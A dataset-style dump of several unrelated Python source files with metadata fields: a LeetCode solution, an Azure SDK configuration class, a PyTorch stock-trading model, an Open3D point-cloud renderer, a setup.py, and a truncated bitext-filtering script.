def maxProduct(self, words):
"""
:type words: List[str]
:rtype: int
"""
wordsDict = {}
for word in words:
wordsDict[word] = set(word)
output = 0
for i in range(len(words)):
for j in range(i+1, len(words)):
if not wordsDict[words[i]]&wordsDict[words[j]]:
output = max(output, len(words[i])*len(words[j]))
return output
| 29.513514 | 244 | 0.581502 |
class Solution:
def maxProduct(self, words):
wordsDict = {}
for word in words:
wordsDict[word] = set(word)
output = 0
for i in range(len(words)):
for j in range(i+1, len(words)):
if not wordsDict[words[i]]&wordsDict[words[j]]:
output = max(output, len(words[i])*len(words[j]))
return output
| true | true |
7900fde3b236c293a428fb7d8f1bd6f8f0e0fcee | 2,945 | py | Python | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/_configuration.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/_configuration.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | 2 | 2020-03-03T23:11:13.000Z | 2020-03-30T18:50:55.000Z | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/_configuration.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any
from azure.core.credentials import TokenCredential
VERSION = "unknown"
class MonitorClientConfiguration(Configuration):
"""Configuration for MonitorClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials.TokenCredential
"""
def __init__(
self,
credential, # type: "TokenCredential"
**kwargs # type: Any
):
# type: (...) -> None
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
super(MonitorClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.api_version = "2017-05-01-preview"
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'mgmt-eventhub/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs # type: Any
):
# type: (...) -> None
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.BearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
| 45.307692 | 129 | 0.681834 |
from typing import TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
if TYPE_CHECKING:
from typing import Any
from azure.core.credentials import TokenCredential
VERSION = "unknown"
class MonitorClientConfiguration(Configuration):
def __init__(
self,
credential,
**kwargs
):
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
super(MonitorClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.api_version = "2017-05-01-preview"
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'mgmt-eventhub/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs
):
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.BearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
| true | true |
7900fe6b4324af019ea50bf8ebbfcd7c728fc238 | 3,829 | py | Python | stock_trading_backend/agent/neural_network_model.py | iryzhkov/stock-trading-backend | 7161026b7b4deb78a934b66550c85a27c6b32933 | [
"MIT"
] | 1 | 2021-01-27T18:24:02.000Z | 2021-01-27T18:24:02.000Z | stock_trading_backend/agent/neural_network_model.py | iryzhkov/stock-trading-backend | 7161026b7b4deb78a934b66550c85a27c6b32933 | [
"MIT"
] | null | null | null | stock_trading_backend/agent/neural_network_model.py | iryzhkov/stock-trading-backend | 7161026b7b4deb78a934b66550c85a27c6b32933 | [
"MIT"
] | null | null | null | """Polynomial model class used by agents for building stuff.
"""
from torch import nn, optim
import torch
import torch.nn.functional as F
from stock_trading_backend.agent.model import Model
class NNModel(nn.Module):
"""Torch neural network model.
"""
def __init__(self, num_inputs, num_hidden_layers, num_inner_features):
"""Initializer for linear model.
Args:
num_inputs: the dimension of input data.
num_hidden_layers: the number of hidden layers.
num_inner_features: the number of features in the hidden layers
"""
super(NNModel, self).__init__()
self.input_layer = nn.Linear(num_inputs, num_inner_features)
hidden_layers = []
for _ in range(num_hidden_layers):
hidden_layers.append(nn.Linear(num_inner_features, num_inner_features))
hidden_layers.append(nn.ReLU())
self.hidden_layers = nn.Sequential(*hidden_layers)
self.output_layer = nn.Linear(num_inner_features, 1)
def forward(self, input_tensor):
"""Forward pass on the neural network model.
Args:
input_tensor: the input tensor.
Returns:
Tensor with model results.
"""
output = F.relu(self.input_layer(input_tensor))
output = self.hidden_layers(output)
output = self.output_layer(output)
return output
class NeuralNetworkModel(Model):
"""Neural netowrk model class.
"""
name = "neural_network_model"
def __init__(self, learning_rate=1e-3, num_hidden_layers=1, num_inner_features=100):
"""Initializer for model class.
Args:
learning_rate: the learning rate of the model.
num_hidden_layers: number of hidden layers in the network.
num_inner_features: number of features in the hidden layers.
"""
super(NeuralNetworkModel, self).__init__()
self.model = None
self.optimizer = None
self.criterion = nn.MSELoss()
self.learning_rate = learning_rate
self.num_hidden_layers = num_hidden_layers
self.num_inner_features = num_inner_features
self.id_str = "{}_{}_{}_{}".format(self.name, learning_rate, num_hidden_layers,
num_inner_features)
def _init_model(self, num_inputs):
"""Initializes internal linear model.
Args:
num_inputs: number of inputs that model will have.
"""
self.model = NNModel(num_inputs, self.num_hidden_layers, self.num_inner_features)
self.optimizer = optim.Adam(self.model.parameters(), lr=self.learning_rate)
def _predict(self, state_action_tensor):
"""Use provided information to make a prediction.
Args:
state_action_tensor: pytorch tensor with state-action values.
Returns:
Predicted values for observation-action tensors.
"""
if self.model is None:
self._init_model(state_action_tensor.shape[1])
return self.model(state_action_tensor).detach().reshape(-1)
def _train(self, state_action_tensor, expected_values_tensor):
"""Train the model for 1 epoch.
Args:
state_action_tensor: pytorch tensor with state-action expected_values.
expected_values: pytorch tensor with expected values for each state-action.
Returns:
The loss before trainig.
"""
if self.model is None:
self._init_model(state_action_tensor.shape[1])
self.optimizer.zero_grad()
output = self.model(state_action_tensor)
loss = self.criterion(output, expected_values_tensor)
loss_value = loss.data.item()
loss.backward()
self.optimizer.step()
return loss_value
| 34.495495 | 89 | 0.648211 | from torch import nn, optim
import torch
import torch.nn.functional as F
from stock_trading_backend.agent.model import Model
class NNModel(nn.Module):
def __init__(self, num_inputs, num_hidden_layers, num_inner_features):
super(NNModel, self).__init__()
self.input_layer = nn.Linear(num_inputs, num_inner_features)
hidden_layers = []
for _ in range(num_hidden_layers):
hidden_layers.append(nn.Linear(num_inner_features, num_inner_features))
hidden_layers.append(nn.ReLU())
self.hidden_layers = nn.Sequential(*hidden_layers)
self.output_layer = nn.Linear(num_inner_features, 1)
def forward(self, input_tensor):
output = F.relu(self.input_layer(input_tensor))
output = self.hidden_layers(output)
output = self.output_layer(output)
return output
class NeuralNetworkModel(Model):
name = "neural_network_model"
def __init__(self, learning_rate=1e-3, num_hidden_layers=1, num_inner_features=100):
super(NeuralNetworkModel, self).__init__()
self.model = None
self.optimizer = None
self.criterion = nn.MSELoss()
self.learning_rate = learning_rate
self.num_hidden_layers = num_hidden_layers
self.num_inner_features = num_inner_features
self.id_str = "{}_{}_{}_{}".format(self.name, learning_rate, num_hidden_layers,
num_inner_features)
def _init_model(self, num_inputs):
self.model = NNModel(num_inputs, self.num_hidden_layers, self.num_inner_features)
self.optimizer = optim.Adam(self.model.parameters(), lr=self.learning_rate)
def _predict(self, state_action_tensor):
if self.model is None:
self._init_model(state_action_tensor.shape[1])
return self.model(state_action_tensor).detach().reshape(-1)
def _train(self, state_action_tensor, expected_values_tensor):
if self.model is None:
self._init_model(state_action_tensor.shape[1])
self.optimizer.zero_grad()
output = self.model(state_action_tensor)
loss = self.criterion(output, expected_values_tensor)
loss_value = loss.data.item()
loss.backward()
self.optimizer.step()
return loss_value
| true | true |
7900fe9b95d5836ad1aeeb57c569a0de0caf1afb | 135 | py | Python | blog/admin.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | blog/admin.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | blog/admin.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Post, SurveyHistory
admin.site.register(Post)
admin.site.register(SurveyHistory)
| 22.5 | 39 | 0.82963 | from django.contrib import admin
from .models import Post, SurveyHistory
admin.site.register(Post)
admin.site.register(SurveyHistory)
| true | true |
7900fe9f1d10228fcdf29352cc73507faa9c2888 | 7,244 | py | Python | PointCloudClass/renderer.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | 3 | 2022-01-16T12:43:29.000Z | 2022-01-22T05:21:40.000Z | PointCloudClass/renderer.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | PointCloudClass/renderer.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import cv2
import numpy as np
from math import cos, sin, pi
from tqdm import tqdm
import open3d as o3d
def render(pointcloud_file_path, estimate_normals_radius, estimate_normals_max_nn):
pointcloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(
radius=estimate_normals_radius,
max_nn=estimate_normals_max_nn))
o3d.visualization.draw_geometries([pointcloud])
return True
class Renderer(object):
def __init__(self):
self.vis = o3d.visualization.Visualizer()
self.render_center = None
self.euler_angle = [0, 0, 0]
return
def getRotationMatrixFromEulerAngle(self, euler_angle):
R_x = np.array([
[1, 0, 0],
[0, cos(euler_angle[0]), -sin(euler_angle[0])],
[0, sin(euler_angle[0]), cos(euler_angle[0])]
])
R_y = np.array([
[cos(euler_angle[1]), 0, sin(euler_angle[1])],
[0, 1, 0],
[-sin(euler_angle[1]), 0, cos(euler_angle[1])]
])
R_z = np.array([
[cos(euler_angle[2]), -sin(euler_angle[2]), 0],
[sin(euler_angle[2]), cos(euler_angle[2]), 0],
[0, 0, 1]
])
rotation_matrix = np.dot(R_z, np.dot(R_y, R_x))
return rotation_matrix
def getRotateDirection(self, direction_vector, euler_angle):
np_direction_vector = np.array(direction_vector)
direction_vector_norm = np.linalg.norm(np_direction_vector)
if direction_vector_norm == 0:
print("[ERROR][Renderer::getRotateDirection]")
print("\t direction_vector_norm is 0!")
return None
np_unit_direction_vector = np_direction_vector / direction_vector_norm
rotation_matrix = self.getRotationMatrixFromEulerAngle(euler_angle)
rotate_direction = np.dot(rotation_matrix, np_unit_direction_vector)
return rotate_direction.tolist()
def rotateVis(self, delta_rotate_angle):
self.euler_angle[0] = 0
self.euler_angle[1] = -10 * pi / 180.0
self.euler_angle[2] += delta_rotate_angle * pi / 180.0
ctr = self.vis.get_view_control()
front_direction = self.getRotateDirection(
[1, 0, 0], self.euler_angle)
ctr.set_front(front_direction)
up_direction = self.getRotateDirection(
[0, 0, 1], self.euler_angle)
ctr.set_up(up_direction)
ctr.set_lookat(self.render_center)
# ctr.set_zoom(0.5)
return True
def render(self, show_labels, scene_pointcloud_file_path=None):
delta_rotate_angle = 0.5
if scene_pointcloud_file_path is not None:
print("start reading floor and wall...")
self.splitLabeledPoints(scene_pointcloud_file_path)
rendered_pointcloud = o3d.geometry.PointCloud()
render_points = []
render_colors = []
print("start create rendered pointcloud...")
for i in tqdm(range(len(self.pointcloud_list))):
points = np.asarray(self.pointcloud_list[i].points).tolist()
if len(points) == 0:
continue
for point in points:
render_points.append(point)
render_colors.append(self.d3_40_colors_rgb[i % len(self.d3_40_colors_rgb)] / 255.0)
if scene_pointcloud_file_path is not None:
print("start create rendered floor...")
for wall_point in tqdm(self.labeled_point_cluster_list[0]):
if abs(wall_point[2]) > 0.01:
continue
render_points.append(wall_point)
render_colors.append(np.array([132, 133, 135], dtype=np.uint8) / 255.0)
rendered_pointcloud.points = o3d.utility.Vector3dVector(np.array(render_points))
rendered_pointcloud.colors = o3d.utility.Vector3dVector(np.array(render_colors))
rendered_pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))
self.render_center = rendered_pointcloud.get_axis_aligned_bounding_box().get_center()
self.vis.create_window(window_name="Open3D RenderObject")
render_option = self.vis.get_render_option()
render_option.background_color = np.array([1, 1, 1])
render_option.point_size = 1
self.vis.add_geometry(rendered_pointcloud)
while True:
self.rotateVis(delta_rotate_angle)
# self.vis.update_geometry()
self.vis.poll_events()
self.vis.update_renderer()
if ord('q') == cv2.waitKey(1):
break
self.vis.destroy_window()
return True
def saveRender(self, output_video_file_path):
fps = 30
video_width = 1920
video_height = 1080
delta_rotate_angle = 0.5
if scene_pointcloud_file_path is not None:
print("start reading floor and wall...")
self.splitLabeledPoints(scene_pointcloud_file_path)
rendered_pointcloud = o3d.geometry.PointCloud()
render_points = []
render_colors = []
print("start create rendered pointcloud...")
for i in tqdm(range(len(self.pointcloud_list))):
points = np.asarray(self.pointcloud_list[i].points).tolist()
if len(points) == 0:
continue
for point in points:
render_points.append(point)
render_colors.append(self.d3_40_colors_rgb[i % len(self.d3_40_colors_rgb)] / 255.0)
if scene_pointcloud_file_path is not None:
print("start create rendered floor...")
for wall_point in tqdm(self.labeled_point_cluster_list[0]):
if abs(wall_point[2]) > 0.01:
continue
render_points.append(wall_point)
render_colors.append(np.array([132, 133, 135], dtype=np.uint8) / 255.0)
rendered_pointcloud.points = o3d.utility.Vector3dVector(np.array(render_points))
rendered_pointcloud.colors = o3d.utility.Vector3dVector(np.array(render_colors))
self.render_center = rendered_pointcloud.get_axis_aligned_bounding_box().get_center()
self.vis.create_window(window_name="Open3D RenderObject")
render_option = self.vis.get_render_option()
render_option.background_color = np.array([1, 1, 1])
render_option.point_size = 1
self.vis.add_geometry(rendered_pointcloud)
fourcc = cv2.VideoWriter_fourcc(*'MP4V')
out = cv2.VideoWriter(output_video_file_path, fourcc, fps, (video_width, video_height))
for i in range(int(360 / delta_rotate_angle)):
self.rotateVis(0.5)
# self.vis.update_geometry()
self.vis.poll_events()
self.vis.update_renderer()
open3d_image = np.asarray(self.vis.capture_screen_float_buffer()) * 255.0
cv_image = cv2.cvtColor(open3d_image, cv2.COLOR_RGB2BGR).astype(np.uint8)
out.write(cv_image)
self.vis.destroy_window()
out.release()
return True
| 37.148718 | 99 | 0.633214 |
import cv2
import numpy as np
from math import cos, sin, pi
from tqdm import tqdm
import open3d as o3d
def render(pointcloud_file_path, estimate_normals_radius, estimate_normals_max_nn):
pointcloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(
radius=estimate_normals_radius,
max_nn=estimate_normals_max_nn))
o3d.visualization.draw_geometries([pointcloud])
return True
class Renderer(object):
def __init__(self):
self.vis = o3d.visualization.Visualizer()
self.render_center = None
self.euler_angle = [0, 0, 0]
return
def getRotationMatrixFromEulerAngle(self, euler_angle):
R_x = np.array([
[1, 0, 0],
[0, cos(euler_angle[0]), -sin(euler_angle[0])],
[0, sin(euler_angle[0]), cos(euler_angle[0])]
])
R_y = np.array([
[cos(euler_angle[1]), 0, sin(euler_angle[1])],
[0, 1, 0],
[-sin(euler_angle[1]), 0, cos(euler_angle[1])]
])
R_z = np.array([
[cos(euler_angle[2]), -sin(euler_angle[2]), 0],
[sin(euler_angle[2]), cos(euler_angle[2]), 0],
[0, 0, 1]
])
rotation_matrix = np.dot(R_z, np.dot(R_y, R_x))
return rotation_matrix
def getRotateDirection(self, direction_vector, euler_angle):
np_direction_vector = np.array(direction_vector)
direction_vector_norm = np.linalg.norm(np_direction_vector)
if direction_vector_norm == 0:
print("[ERROR][Renderer::getRotateDirection]")
print("\t direction_vector_norm is 0!")
return None
np_unit_direction_vector = np_direction_vector / direction_vector_norm
rotation_matrix = self.getRotationMatrixFromEulerAngle(euler_angle)
rotate_direction = np.dot(rotation_matrix, np_unit_direction_vector)
return rotate_direction.tolist()
def rotateVis(self, delta_rotate_angle):
self.euler_angle[0] = 0
self.euler_angle[1] = -10 * pi / 180.0
self.euler_angle[2] += delta_rotate_angle * pi / 180.0
ctr = self.vis.get_view_control()
front_direction = self.getRotateDirection(
[1, 0, 0], self.euler_angle)
ctr.set_front(front_direction)
up_direction = self.getRotateDirection(
[0, 0, 1], self.euler_angle)
ctr.set_up(up_direction)
ctr.set_lookat(self.render_center)
return True
def render(self, show_labels, scene_pointcloud_file_path=None):
delta_rotate_angle = 0.5
if scene_pointcloud_file_path is not None:
print("start reading floor and wall...")
self.splitLabeledPoints(scene_pointcloud_file_path)
rendered_pointcloud = o3d.geometry.PointCloud()
render_points = []
render_colors = []
print("start create rendered pointcloud...")
for i in tqdm(range(len(self.pointcloud_list))):
points = np.asarray(self.pointcloud_list[i].points).tolist()
if len(points) == 0:
continue
for point in points:
render_points.append(point)
render_colors.append(self.d3_40_colors_rgb[i % len(self.d3_40_colors_rgb)] / 255.0)
if scene_pointcloud_file_path is not None:
print("start create rendered floor...")
for wall_point in tqdm(self.labeled_point_cluster_list[0]):
if abs(wall_point[2]) > 0.01:
continue
render_points.append(wall_point)
render_colors.append(np.array([132, 133, 135], dtype=np.uint8) / 255.0)
rendered_pointcloud.points = o3d.utility.Vector3dVector(np.array(render_points))
rendered_pointcloud.colors = o3d.utility.Vector3dVector(np.array(render_colors))
rendered_pointcloud.estimate_normals(
search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30))
self.render_center = rendered_pointcloud.get_axis_aligned_bounding_box().get_center()
self.vis.create_window(window_name="Open3D RenderObject")
render_option = self.vis.get_render_option()
render_option.background_color = np.array([1, 1, 1])
render_option.point_size = 1
self.vis.add_geometry(rendered_pointcloud)
while True:
self.rotateVis(delta_rotate_angle)
self.vis.poll_events()
self.vis.update_renderer()
if ord('q') == cv2.waitKey(1):
break
self.vis.destroy_window()
return True
def saveRender(self, output_video_file_path):
fps = 30
video_width = 1920
video_height = 1080
delta_rotate_angle = 0.5
if scene_pointcloud_file_path is not None:
print("start reading floor and wall...")
self.splitLabeledPoints(scene_pointcloud_file_path)
rendered_pointcloud = o3d.geometry.PointCloud()
render_points = []
render_colors = []
print("start create rendered pointcloud...")
for i in tqdm(range(len(self.pointcloud_list))):
points = np.asarray(self.pointcloud_list[i].points).tolist()
if len(points) == 0:
continue
for point in points:
render_points.append(point)
render_colors.append(self.d3_40_colors_rgb[i % len(self.d3_40_colors_rgb)] / 255.0)
if scene_pointcloud_file_path is not None:
print("start create rendered floor...")
for wall_point in tqdm(self.labeled_point_cluster_list[0]):
if abs(wall_point[2]) > 0.01:
continue
render_points.append(wall_point)
render_colors.append(np.array([132, 133, 135], dtype=np.uint8) / 255.0)
rendered_pointcloud.points = o3d.utility.Vector3dVector(np.array(render_points))
rendered_pointcloud.colors = o3d.utility.Vector3dVector(np.array(render_colors))
self.render_center = rendered_pointcloud.get_axis_aligned_bounding_box().get_center()
self.vis.create_window(window_name="Open3D RenderObject")
render_option = self.vis.get_render_option()
render_option.background_color = np.array([1, 1, 1])
render_option.point_size = 1
self.vis.add_geometry(rendered_pointcloud)
fourcc = cv2.VideoWriter_fourcc(*'MP4V')
out = cv2.VideoWriter(output_video_file_path, fourcc, fps, (video_width, video_height))
for i in range(int(360 / delta_rotate_angle)):
self.rotateVis(0.5)
self.vis.poll_events()
self.vis.update_renderer()
open3d_image = np.asarray(self.vis.capture_screen_float_buffer()) * 255.0
cv_image = cv2.cvtColor(open3d_image, cv2.COLOR_RGB2BGR).astype(np.uint8)
out.write(cv_image)
self.vis.destroy_window()
out.release()
return True
| true | true |
7900febf603696941fe6da7ea7814f90b83bef77 | 2,585 | py | Python | setup.py | zurk/ml-core | 4a85c7cc773657bb6dacf47dd8852197f9bb93c1 | [
"Apache-2.0"
] | null | null | null | setup.py | zurk/ml-core | 4a85c7cc773657bb6dacf47dd8852197f9bb93c1 | [
"Apache-2.0"
] | null | null | null | setup.py | zurk/ml-core | 4a85c7cc773657bb6dacf47dd8852197f9bb93c1 | [
"Apache-2.0"
] | null | null | null | from importlib.machinery import SourceFileLoader
import io
import os.path
from setuptools import find_packages, setup
sourcedml = SourceFileLoader("sourced-ml-core", "./sourced/ml/core/__init__.py").load_module()
with io.open(os.path.join(os.path.dirname(__file__), "README.md"), encoding="utf-8") as f:
long_description = f.read()
include_tests = os.getenv("ML_CORE_SETUP_INCLUDE_TESTS", False)
exclude_packages = (("sourced.ml.core.tests", "sourced.ml.core.tests.source")
if not include_tests else ())
tf_requires = ["tensorflow>=1.0,<1.14"]
tf_gpu_requires = ["tensorflow-gpu>=1.0,<1.14"]
package_data = {"": ["LICENSE.md", "README.md"]}
if include_tests:
test_data_dirs = ["./asdf/*.asdf", "./swivel/*", "identifiers.csv.tar.gz"]
package_data["sourced.ml.core.tests"] = test_data_dirs
setup(
name="sourced-ml-core",
description="Library containing the core algorithms for machine learning on source code. "
"Provides API and tools to train and use models based "
"on source code features extracted from Babelfish's UASTs.",
long_description=long_description,
long_description_content_type="text/markdown",
version=sourcedml.__version__,
license="Apache 2.0",
author="source{d}",
author_email="machine-learning@sourced.tech",
url="https://github.com/src-d/ml-core",
download_url="https://github.com/src-d/ml-core",
packages=find_packages(exclude=exclude_packages),
namespace_packages=["sourced", "sourced.ml"],
keywords=[
"machine learning on source code",
"word2vec",
"id2vec",
"github",
"swivel",
"bow",
"bblfsh",
"babelfish",
],
install_requires=[
"PyStemmer>=1.3,<2.0",
"bblfsh>=3.1.0,<4.0",
"modelforge>=0.14.1",
"pygments>=2.2.0,<3.0",
"keras>=2.0,<3.0",
"scikit-learn>=0.21.1,<1.0",
"tqdm>=4.20,<5.0",
],
extras_require={"tf": tf_requires, "tf_gpu": tf_gpu_requires},
tests_require=["docker>=3.6.0,<4.0"],
package_data=package_data,
python_requires=">=3.5",
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Software Development :: Libraries",
],
)
| 35.410959 | 94 | 0.629014 | from importlib.machinery import SourceFileLoader
import io
import os.path
from setuptools import find_packages, setup
sourcedml = SourceFileLoader("sourced-ml-core", "./sourced/ml/core/__init__.py").load_module()
with io.open(os.path.join(os.path.dirname(__file__), "README.md"), encoding="utf-8") as f:
long_description = f.read()
include_tests = os.getenv("ML_CORE_SETUP_INCLUDE_TESTS", False)
exclude_packages = (("sourced.ml.core.tests", "sourced.ml.core.tests.source")
if not include_tests else ())
tf_requires = ["tensorflow>=1.0,<1.14"]
tf_gpu_requires = ["tensorflow-gpu>=1.0,<1.14"]
package_data = {"": ["LICENSE.md", "README.md"]}
if include_tests:
test_data_dirs = ["./asdf/*.asdf", "./swivel/*", "identifiers.csv.tar.gz"]
package_data["sourced.ml.core.tests"] = test_data_dirs
setup(
name="sourced-ml-core",
description="Library containing the core algorithms for machine learning on source code. "
"Provides API and tools to train and use models based "
"on source code features extracted from Babelfish's UASTs.",
long_description=long_description,
long_description_content_type="text/markdown",
version=sourcedml.__version__,
license="Apache 2.0",
author="source{d}",
author_email="machine-learning@sourced.tech",
url="https://github.com/src-d/ml-core",
download_url="https://github.com/src-d/ml-core",
packages=find_packages(exclude=exclude_packages),
namespace_packages=["sourced", "sourced.ml"],
keywords=[
"machine learning on source code",
"word2vec",
"id2vec",
"github",
"swivel",
"bow",
"bblfsh",
"babelfish",
],
install_requires=[
"PyStemmer>=1.3,<2.0",
"bblfsh>=3.1.0,<4.0",
"modelforge>=0.14.1",
"pygments>=2.2.0,<3.0",
"keras>=2.0,<3.0",
"scikit-learn>=0.21.1,<1.0",
"tqdm>=4.20,<5.0",
],
extras_require={"tf": tf_requires, "tf_gpu": tf_gpu_requires},
tests_require=["docker>=3.6.0,<4.0"],
package_data=package_data,
python_requires=">=3.5",
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Software Development :: Libraries",
],
)
| true | true |
790100c41c4e8118a8fa42a53463e0bcfccb4adf | 4,854 | py | Python | baseline/filter_hunalign_bitext.py | christianbuck/CorpusMining | f9248c3528a415a1e5af2c5a54a60c16cd79ff1d | [
"Apache-2.0"
] | 2 | 2017-02-08T14:37:01.000Z | 2017-02-08T17:25:39.000Z | baseline/filter_hunalign_bitext.py | christianbuck/CorpusMining | f9248c3528a415a1e5af2c5a54a60c16cd79ff1d | [
"Apache-2.0"
] | null | null | null | baseline/filter_hunalign_bitext.py | christianbuck/CorpusMining | f9248c3528a415a1e5af2c5a54a60c16cd79ff1d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import defaultdict
import argparse
import cld2
import langid
import sys
""" Removes some wrongly aligned pairs from hunalign output """
class LanguageIdentifier(object):
def __init__(self, use_cld2, valid_languages=None):
self.use_cld2 = use_cld2
self.valid_languages = [l.lower() for l in valid_languages]
if not use_cld2 and valid_languages:
langid.set_languages(self.valid_languages)
def is_language(self, s, expected_lang):
""" Check if the language of the segment cannot be reliably identified
as another language. If another than the expected language is
detected return False """
expected_lang = expected_lang.lower()
if self.valid_languages:
assert expected_lang in self.valid_languages
if self.use_cld2:
reliable, _text_bytes, details = cld2.detect(
s.encode("utf-8"),
isPlainText=True,
useFullLangTables=True,
bestEffort=True)
if reliable:
for _lang, langcode, confidence, score in details:
if langcode == expected_lang and confidence >= 10:
return True
return False
else: # unreliable is still counted as OK
return True
else:
lang, confidence = langid.classify(source.lower())
if lang != expected_lang and confidence > 0.9:
# confidence for wrong language higher than 90%
return False
else:
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('infile', nargs='?', type=argparse.FileType('r'),
default=sys.stdin)
parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'),
default=sys.stdout)
parser.add_argument('-deleted', help='file to keep deleted lines',
type=argparse.FileType('w'))
parser.add_argument('-minscore', type=float, default=0,
help='minimum score from hunalign')
parser.add_argument('-slang', '--lang1', help='source language',
dest='source_lang', default='en')
parser.add_argument('-tlang', '--lang2', help='target language',
dest='target_lang', default='fr')
parser.add_argument('-cld2', help='use CLD2 instead of langid.py',
action='store_true')
args = parser.parse_args()
deletions = defaultdict(list)
n_written = 0
n_total = 0
lid = LanguageIdentifier(args.cld2, [args.source_lang, args.target_lang])
for line in args.infile:
n_total += 1
score = 1.0
split_line = line.rstrip('\n').split("\t")
if len(split_line) == 5:
split_line = split_line[-3:]
if len(split_line) == 3:
source, target, score = split_line
else:
assert len(split_line) == 2
source, target = split_line
source = source.decode('utf-8', 'ignore')
target = target.decode('utf-8', 'ignore')
if source == target:
deletions["identical"].append(target)
continue
if not source.strip():
deletions["source_empty"].append('')
continue
elif not target.strip():
deletions["target_empty"].append('')
continue
if float(score) < args.minscore:
deletions["low score"].append("\t".join((source, target, score)))
continue
if float((len(source) + 15)) / float(len(target) + 15) > 1.5:
